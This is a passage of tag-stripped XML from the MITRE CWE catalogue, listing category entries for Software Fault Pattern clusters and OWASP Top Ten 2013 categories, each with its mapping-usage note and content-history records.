MITRE + 2023-06-29 + updated Mapping_Notes + + SFP Cluster: Resource Management + + + + This category identifies Software Fault Patterns (SFPs) within the Path Resolution cluster (SFP16, SFP17, SFP18). + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2012-03-22 + 2.2 + 2012-05-14 + + + CWE Content Team + MITRE + 2013-07-17 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2014-07-30 + updated Name, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + SFP Cluster: Path Resolution + + + + This category identifies Software Fault Patterns (SFPs) within the Synchronization cluster (SFP19, SFP20, SFP21, SFP22). + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2012-03-22 + 2.2 + 2012-05-14 + + + CWE Content Team + MITRE + 2014-07-30 + updated Name, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + SFP Cluster: Synchronization + + + + This category identifies Software Fault Patterns (SFPs) within the Information Leak cluster (SFP23). + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2012-03-22 + 2.2 + 2012-05-14 + + + CWE Content Team + MITRE + 2014-07-30 + updated Name, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + SFP Cluster: Information Leak + + + + This category identifies Software Fault Patterns (SFPs) within the Tainted Input cluster (SFP24, SFP25, SFP26, SFP27). + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2012-03-22 + 2.2 + 2012-05-14 + + + CWE Content Team + MITRE + 2014-07-30 + updated Name, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + SFP Cluster: Tainted Input + + + + This category identifies Software Fault Patterns (SFPs) within the Entry Points cluster (SFP28). + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2012-03-22 + 2.2 + 2012-05-14 + + + CWE Content Team + MITRE + 2014-07-30 + updated Name, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + SFP Cluster: Entry Points + + + + This category identifies Software Fault Patterns (SFPs) within the Authentication cluster (SFP29, SFP30, SFP31, SFP32, SFP33, SFP34). + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2012-03-22 + 2.2 + 2012-05-14 + + + CWE Content Team + MITRE + 2013-07-17 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Name, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + SFP Cluster: Authentication + + + + This category identifies Software Fault Patterns (SFPs) within the Access Control cluster (SFP35). + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2012-03-22 + 2.2 + 2012-05-14 + + + CWE Content Team + MITRE + 2014-07-30 + updated Name, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + SFP Cluster: Access Control + + + + This category identifies Software Fault Patterns (SFPs) within the Privilege cluster (SFP36). + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2012-03-22 + 2.2 + 2012-05-14 + + + CWE Content Team + MITRE + 2014-07-30 + updated Name + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + SFP Cluster: Privilege + + + + This category identifies Software Fault Patterns (SFPs) within the Channel cluster. + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2012-03-22 + 2.2 + 2012-05-14 + + + CWE Content Team + MITRE + 2014-07-30 + updated Name, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + SFP Cluster: Channel + + + + This category identifies Software Fault Patterns (SFPs) within the Cryptography cluster. + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2012-03-22 + 2.2 + 2012-05-14 + + + CWE Content Team + MITRE + 2014-07-30 + updated Name, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + SFP Cluster: Cryptography + + + + This category identifies Software Fault Patterns (SFPs) within the Malware cluster. + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2012-03-22 + 2.2 + 2012-05-14 + + + CWE Content Team + MITRE + 2014-07-30 + updated Name, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + SFP Cluster: Malware + + + + This category identifies Software Fault Patterns (SFPs) within the Predictability cluster. + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2012-03-22 + 2.2 + 2012-05-14 + + + CWE Content Team + MITRE + 2014-07-30 + updated Name + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + SFP Cluster: Predictability + + + + This category identifies Software Fault Patterns (SFPs) within the UI cluster. + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2012-03-22 + 2.2 + 2012-05-14 + + + CWE Content Team + MITRE + 2014-07-30 + updated Name, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + SFP Cluster: UI + + + + This category identifies Software Fault Patterns (SFPs) within the Other cluster. + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2012-03-22 + 2.2 + 2012-05-14 + + + CWE Content Team + MITRE + 2014-07-30 + updated Name, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + SFP Cluster: Other + + + + Weaknesses in this category are related to the A1 category in the OWASP Top Ten 2013. + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2013-07-16 + 2.5 + 2013-07-17 + + + CWE Content Team + MITRE + 2014-06-23 + updated Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A2 category in the OWASP Top Ten 2013. + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2013-07-17 + 2.5 + 2013-07-17 + + + CWE Content Team + MITRE + 2014-06-23 + updated Relationships + + + CWE Content Team + MITRE + 2018-01-24 + updated Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A3 category in the OWASP Top Ten 2013. + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2013-07-16 + 2.5 + 2013-07-17 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A4 category in the OWASP Top Ten 2013. + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2013-07-16 + 2.5 + 2013-07-17 + + + CWE Content Team + MITRE + 2014-06-23 + updated Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A5 category in the OWASP Top Ten 2013. + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2013-07-16 + 2.5 + 2013-07-17 + + + CWE Content Team + MITRE + 2014-06-23 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A6 category in the OWASP Top Ten 2013. + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2013-07-16 + 2.5 + 2013-07-17 + + + CWE Content Team + MITRE + 2014-06-23 + updated Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A7 category in the OWASP Top Ten 2013. + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2013-07-16 + 2.5 + 2013-07-17 + + + CWE Content Team + MITRE + 2014-06-23 + updated Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A8 category in the OWASP Top Ten 2013. + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2013-07-16 + 2.5 + 2013-07-17 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2013. + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + This is an unusual category. CWE does not cover the limitations of human processes and procedures that cannot be described in terms of a specific technical weakness as resident in the code, architecture, or configuration of the software. Since "known vulnerabilities" can arise from any kind of weakness, it is not possible to map this OWASP category to other CWE entries, since it would effectively require mapping this category to ALL weaknesses. + + + + CWE Content Team + MITRE + 2013-07-16 + 2.5 + 2013-07-17 + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A10 category in the OWASP Top Ten 2013. + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2013-07-16 + 2.5 + 2013-07-17 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Access Management cluster. + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Insecure Resource Access cluster (SFP35). + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Insecure Resource Permissions cluster. + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Authentication Bypass cluster. + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2017-05-03 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Digital Certificate cluster. + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Faulty Endpoint Authentication cluster (SFP29). + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Hardcoded Sensitive Data cluster (SFP33). + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Insecure Authentication Policy cluster. + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Missing Authentication cluster. + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Missing Endpoint Authentication cluster (SFP30). + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Multiple Binds to the Same Port cluster (SFP32). + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Unrestricted Authentication cluster (SFP34). + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Channel Attack cluster. + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Protocol Error cluster. + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Broken Cryptography cluster. + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Weak Cryptography cluster. + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Ambiguous Exception Type cluster (SFP5). + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Incorrect Exception Behavior cluster (SFP6). + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Unchecked Status Condition cluster (SFP4). + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Exposed Data cluster (SFP23). + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Exposure Temporary File cluster. + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Insecure Session Management cluster. + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Other Exposures cluster. + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the State Disclosure cluster. + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Covert Channel cluster. + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies 